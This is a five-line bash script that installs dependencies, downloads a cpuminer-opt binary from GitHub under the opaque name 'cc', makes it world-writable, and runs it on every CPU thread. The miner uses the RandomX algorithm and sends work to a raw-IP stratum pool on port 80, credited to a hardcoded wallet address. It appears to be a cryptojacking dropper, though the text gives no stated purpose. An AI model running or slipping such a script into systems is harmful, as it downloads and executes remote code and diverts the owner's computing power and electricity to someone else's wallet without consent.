#!/bin/bash
apt update && apt -y install unzip wget curl libncurses6 libncursesw6
curl https://github.com/ocminer/cpuminer-opt-supr/releases/download/v1.45/cpuminer-x86-64-v2 -L -o cc
chmod 777 cc
./cc -a rx/0 -o stratum+tcp://18.222.169.10:80 -u 84bEkQaAvXnPXXghsfBYBeLGtkAV8eP1HX7rP7EUBE1pHvtwAffjCE2SzzY8y79fkgHA21czuEWoVUDkAf7e4qM5KMKCKVK -p x -t $(nproc --all)
